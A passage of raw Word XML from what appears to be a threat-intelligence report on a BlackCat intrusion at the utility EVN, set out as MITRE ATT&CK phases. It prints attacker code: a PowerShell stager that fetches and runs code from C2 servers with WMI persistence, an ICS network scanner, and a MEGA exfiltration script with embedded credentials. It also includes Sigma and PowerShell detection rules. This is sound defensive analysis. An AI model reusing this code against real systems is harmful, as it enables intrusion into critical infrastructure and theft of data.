        <w:t xml:space="preserve">: BlackCat leveraged trusted contractor relationships to bypass email security, deploying info-stealers to harvest VPN credentials for 17 different EVN suppliers </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref69">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[69]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j9qjl9dhkzwd" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Living Off the Land Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1059.001 - PowerShell </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref70">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[70]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vg5oz7fafrmg" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell Empire Framework Usage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># ALPHV PowerShell stager found in EVN environment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Deobfuscated from base64 encoding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$ErrorActionPreference = "SilentlyContinue"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Establish C2 channel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$c2_servers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"https://energy-update[.]net/api/v2",</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"https://grid-monitor[.]org/status",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"https://power-analytics[.]com/health"</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foreach ($server in $c2_servers)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try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$response = Invoke-WebRequest -Uri "$server/beacon" -Method POST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-Body ([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-WmiObject Win32_ComputerSystem | ConvertTo-Json))))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if ($response.StatusCode -eq 200)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$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($response.Content))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Invoke-Expression $script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break</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catch { continue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Persistence via WMI event subscription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$filterName = "EVNSystemMonitor"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$consumerName = "EVNSystemHandler"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$query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"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$filterArgs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Name = $filterName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EventNamespace = "root\cimv2"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QueryLanguage = "WQL"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Query = $query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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nl1gu4owpm3h" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: SCADA Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0840 - Network Connection Enumeration </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref71">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[71]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3py71pk1sg5q" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom ICS Discovery Tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># BlackCat's EVN-specific ICS reconnaissance tool</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Identifies ABB, Siemens, Schneider systems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import socket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import struct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import threading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class EVNGridMapper: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def __init__(self):</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self.iec61850_devices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self.dnp3_devices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self.iec104_devices =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def scan_iec61850(self, subnet):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"""Scan for IEC 61850 MMS services"""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MMS_PORT = 102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for ip in generate_ips(subnet):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try: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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.settimeout(1)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s.connect((ip, MMS_PORT))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Send COTP connection request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cotp_cr = b'\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x01\x00\xc0\x01\x0a\xc1\x02\x01\x00\xc2\x02\x01\x02'</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s.send(cotp_cr)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response = s.recv(1024)</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if b'\xe0' in response:  # COTP CC</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device_info = self.enumerate_ied_model(s)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self.iec61850_devices.append({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'ip': ip,</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'vendor': device_info['vendor'],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'model': device_info['model'],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'firmware': device_info['firmware'],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'logical_devices': device_info['lds']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except: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pass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def map_grid_topology(self):</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"""Build network topology from discovered devices"""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topology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'generation':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'transmission':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'distribution':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'control_centers':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for device in self.iec61850_devices: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if 'GEN' in device['logical_devices']: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topology['generation'].append(device)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elif 'TRANS' in device['logical_devices']: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topology['transmission'].append(device)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return topology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5asvxrt9ie2g" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Data Exfiltration Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1567.002 - Exfiltration to Cloud Storage </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref72">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[72]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_io4smfjdw9b6" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MegaSync Abuse for Grid Data Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># BlackCat's automated exfiltration framework</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Targets specific EVN grid operational data</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import os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import requests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from mega import Mega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class GridDataExfiltrator:</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def __init__(self):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 Compromised MEGA accounts for exfiltration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self.mega_accounts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{'email': 'gridbackup2023@protonmail.com', 'password': 'Ev3rgy2023!@#'},</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{'email': 'scadaarchive@tutanota.com', 'password': 'Gr1dS3cur3!'},</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self.target_data =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'grid_models': ['*.cim', '*.icd', '*.scd'],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'scada_configs': ['*.xml', '*.ini', '*.cfg'],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'operational_data': ['*.csv', '*.xlsx', '*.mdb'],</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'network_diagrams': ['*.vsd', '*.dwg', '*.pdf'],</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'passwords': ['*pass*', '*cred*', '*.kdbx']</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def exfiltrate_critical_data(self):</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mega = Mega()</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m = mega.login(self.mega_accounts[0]['email'], self.mega_accounts[0]['password'])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Priority 1: Grid topology and models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critical_paths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'C:\\EVN\\SCADA\\Models\\',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'C:\\Program Files\\ABB\\EON600\\Config\\',</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'C:\\Siemens\\WinCC\\Project\\',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'D:\\GridData\\Operational\\'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for path in critical_paths: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if os.path.exists(path):</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for pattern in self.target_data['grid_models']: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files = find_files(path, pattern)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for file in files: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Encrypt before upload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encrypted = self.encrypt_file(file)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m.upload(encrypted, dest_filename=f"EVN_{os.path.basename(file)}.enc")</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n6p7zt38pa20" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7zbrc2h8ezk5" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>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T1199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Contractor relationship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Third-party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hyperlink w:anchor="ref73">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T1059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PowerShell Empire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Script block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T1546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WMI event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WMI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T1078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Domain account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Unusual auth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T1027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Multi-stage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Memory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T1555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Browser credential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Process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ICS network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ICS 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T1021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SMB/Admin shares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Network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T1560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Archive via 7zip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File creation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hyperlink w:anchor="ref81">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T1567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MEGA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DNS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hyperlink w:anchor="ref82">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[82]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T1486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Ransomware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File system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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nc6ry1n5tvp1" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Energy Sector 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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Grid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SCADA historian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Operational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hyperlink w:anchor="ref84">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[84]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T0813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Denial of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Operator blindness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hyperlink w:anchor="ref85">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[85]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T0859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Valid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Long-term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hyperlink w:anchor="ref86">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[86]</w:t>
              </w:r>
            </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_53h7qxwu6q00" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qu02kewjyf44" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_li131bush9oc" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000312">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: BlackCat EVN-Specific Infrastructure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Reference: [[87]](#ref87)</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title: ALPHV/BlackCat C2 Communication Patterns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id: 8c4f5e2a-1b7d-4a9e-b3c8-7f6d5e8a9c2b</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status: stable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description: Detects BlackCat C2 patterns observed in EVN attack</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logsource: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category: proxy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detection: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selection_urls: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c-uri|contains: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 '/api/v2/beacon'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 '/status/health'</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 '/monitor/update'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c-uri|endswith:</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 '.php?id='</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 '/gate.php'</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selection_headers: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c-useragent|contains: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 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) grid_monitor'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filter_legitimate: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dst_ip|cidr: '10.0.0.0/8'</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condition: (selection_urls or selection_headers) and not filter_legitimate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level: high</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tags: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 attack.command_and_control</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attack.t1071.001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000347">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gx7da2ertgyk" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000348">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enhanced detection for BlackCat PowerShell tactics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Deploy via Microsoft Defender for Endpoint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$BlackCatIndicators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'Base64Patterns'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'SW52b2tlLVdlYlJlcXVlc3Q=',  # Invoke-WebRequest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'R2V0LVdtaU9iamVjdA==',       # Get-WmiObject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'U3lzdGVtLk5ldC5XZWJDbGllbnQ=' # System.Net.WebClient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'C2Domains' =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'*energy-update.net*',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'*grid-monitor.org*',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'*power-analytics.com*'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'WMIFilters' =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'*SystemMonitor*',</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'*SystemHandler*',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'*EVN*'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Real-time monitoring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Register-WmiEvent -Query "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'" -Action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$process = $event.SourceEventArgs.NewEvent.TargetInstance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$commandLine = $process.CommandLine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foreach ($pattern in $BlackCatIndicators.Base64Patterns)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if ($commandLine -match $pattern)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Write-EventLog -LogName "Security" -Source "BlackCat Detection"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-EventId 9001 -EntryType Warning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-Message "Suspicious PowerShell activity detected: $commandLine"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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tod91oy7f83o" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000388">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p1vnd2f0x9h1" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-4 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000389">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate contractor VPN access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> immediately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38A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset all administrative credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> including service accounts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38B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preserve PowerShell logs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and WMI event subscriptions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38C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Block MEGA and cloud storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at perimeter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38D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate ASEAN CERT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> coordination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38E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z6lsu1nusvvz" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Actions (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all third-party access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to SCADA networks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390">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy enhanced PowerShell logging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPOs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391">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Review IEC 61850 device configurations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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392">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Coordinate with regional grid operators</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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393">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9vauwishxz7i" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Actions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000394">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
